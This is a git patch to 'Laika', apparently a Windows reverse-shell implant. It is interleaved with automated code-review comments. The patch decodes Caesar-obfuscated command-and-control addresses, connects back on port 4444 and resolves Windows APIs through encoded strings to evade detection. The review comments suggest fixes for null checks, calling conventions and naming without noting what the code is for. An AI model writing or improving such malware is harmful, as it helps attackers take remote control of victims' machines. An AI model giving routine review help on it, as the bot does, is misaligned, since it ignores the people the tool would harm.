From 02014633a1bddbb0575aad00e69e6df1e87ad3b5 Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Wed, 15 Feb 2023 19:53:56 +0100 Subject: [PATCH] fix: decrypting an ip that is already decrypted --- Laika/config.h | 8 +++++++- Laika/main.c | 17 +++++++++++++---- Laika/resolve_apis.c | 23 ++++++++++++----------- Laika/resolve_apis.h | 2 ++ 4 files changed, 34 insertions(+), 16 deletions(-) diff --git a/Laika/config.h b/Laika/config.h index eabc268..29e964f 100644 --- a/Laika/config.h +++ b/Laika/config.h @@ -1,3 +1,9 @@ +#define FALLBACK_SERVERS 1 + char* fallback_servers[1] = { - "=3=3=3=", + "6>736;=3638:", +}; + +int fallback_servers_ip[1] = { + 4444, }; \ No newline at end of file diff --git a/Laika/main.c b/Laika/main.c index d50abde..44d31cb 100644 --- a/Laika/main.c +++ b/Laika/main.c @@ -105,8 +105,6 @@ void SendShellEndedSignal(SOCKET sock) { } } -#define FALLBACK_SERVERS 4 - int serv = -1; int main() { InitApis(); @@ -124,7 +122,6 @@ int main() { struct sockaddr_in server; char* server_reply = (char*)Api.malloc(BUFFER_SIZE); server.sin_family = AF_INET; - server.sin_port = Api.htons(1337); WORD wVersionRequested = MAKEWORD(2, 2); WSADATA wsaData; @@ -142,7 +139,19 @@ retry: if (serv > FALLBACK_SERVERS - 1) { serv = 0; } - server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(fallback_servers[serv])); + + //on fait une copie de l'ip chiffrée, puis on la free + //ça évite qu'elle reste dans la mémoire trop longtemps + //ça évite aussi qu'on utilise CAESAR_DECRYPT sur une ip déjà décryptée + size_t len = strlen(fallback_servers[serv]); + char* Tmp = Api.malloc(len + 1); + Api.strcpy(Tmp, fallback_servers[serv]); + + server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(Tmp)); + + Api.free(Tmp); + + server.sin_port = Api.htons(fallback_servers_ip[serv]); //Create socket sock = Api.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); diff --git a/Laika/resolve_apis.c b/Laika/resolve_apis.c index 9c630bd..7fc15df 100644 --- a/Laika/resolve_apis.c +++ b/Laika/resolve_apis.c 
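Review bot: In Laika/config.h the new `fallback_servers_ip` array holds port numbers, not addresses (main.c passes `fallback_servers_ip[serv]` to `Api.htons`), so a name like `fallback_servers_port` would say what it is. Both arrays are still sized with a literal `[1]` even though the hunk introduces `FALLBACK_SERVERS`, so the count used in main.c and the array lengths can drift apart; `char* fallback_servers[FALLBACK_SERVERS]` and `int fallback_servers_port[FALLBACK_SERVERS]` keep them tied together. The arrays are also defined rather than declared in a header, which would presumably cause duplicate-symbol link errors if a second source file includes config.h; this patch does not show which files include it.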
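Review bot: In the `retry:` block of Laika/main.c the pointer returned by `Api.malloc(len + 1)` is passed straight to `Api.strcpy` with no NULL check, so a failed allocation becomes a write through a null pointer. A guard such as `if (Tmp == NULL) return 1;` before the copy would cover it. The three added comments are in French; an English line such as `// decode a heap copy so the table entry is never passed to CAESAR_DECRYPT twice` would state the reason for the change. The block sits inside `main()`, which starts and ends outside the hunk.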
@@ -13,6 +13,18 @@ void InitApis() { } Api.GetProcAddress = (TGetProcAddress)GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyUwthFiiwjxx")); + + hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); + if (!hMsvcrt) { + return; + } + Api.strcpy = (Tstrcpy)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywhu~")); + Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth")); + Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj")); + Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru")); + Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx")); + Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy")); + Api.ReadFile = (TReadFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("WjfiKnqj")); Api.WriteFile = (TWriteFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjKnqj")); Api.CloseHandle = (TCloseHandle)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HqtxjMfsiqj")); @@ -40,17 +52,6 @@ void InitApis() { Api.inet_addr = (Tinet_addr)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("nsjydfiiw")); Api.WSAStartup = (TWSAStartup)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFXyfwyzu")); Api.WSAGetLastError = (TWSAGetLastError)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFLjyQfxyJwwtw")); - - hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); - if (!hMsvcrt) { - return; - } - - Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy")); - Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth")); - Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj")); - Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru")); - Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx")); } void FreeApis() { diff --git a/Laika/resolve_apis.h b/Laika/resolve_apis.h index 12335fa..2faa1c3 100644 --- a/Laika/resolve_apis.h +++ b/Laika/resolve_apis.h 
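Review bot: In the first hunk of Laika/resolve_apis.c the `if (!hMsvcrt) { return; }` check now runs before the `hKernel32` lookups that follow it, so a failed `LoadLibraryA` leaves `Api.ReadFile`, `Api.WriteFile` and every member assigned later in `InitApis()` unset. Because the function returns `void`, the caller cannot detect this. None of the `Api.GetProcAddress` results added here is checked either, so a missing export surfaces only as a call through a null pointer at first use. Returning a status from `InitApis()` and testing it in `main()` would make the failure explicit; the rest of the function body and its declaration lie outside this hunk. The encoded literals also have no comment naming the symbol they stand for, which makes the list hard to audit; a trailing comment per line, for example `/* strcpy */` next to `"xywhu~"`, would fix that.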
@@ -21,6 +21,7 @@ typedef void* (WINAPI* Tmalloc)(size_t); typedef void(WINAPI* Tfree)(void*); typedef int(WINAPI* Tstrncmp)(const char*, const char*, size_t); typedef size_t(WINAPI* Tmbstowcs)(wchar_t*, const char*, size_t); +typedef char*(WINAPI* Tstrcpy)(char*, const char*); typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED); typedef BOOL(WINAPI* TWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED); @@ -67,6 +68,7 @@ typedef struct ApiList { TGetProcAddress GetProcAddress; Tmbstowcs mbstowcs; + Tstrcpy strcpy; } API; void InitApis();
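Review bot: The new `Tstrcpy` typedef in Laika/resolve_apis.h is declared `WINAPI` (stdcall on 32-bit x86), but `strcpy` as exported by the C runtime uses the C calling convention. On an x86 build a call through `Api.strcpy` therefore leaves the stack pointer off by the size of the arguments; on x64 the two conventions coincide, which hides the mismatch. The line should read `typedef char* (__cdecl* Tstrcpy)(char*, const char*);`. The neighbouring `Tmalloc`, `Tfree`, `Tstrncmp` and `Tmbstowcs` context lines carry the same `WINAPI` and would need the same correction, which is outside what this commit touches.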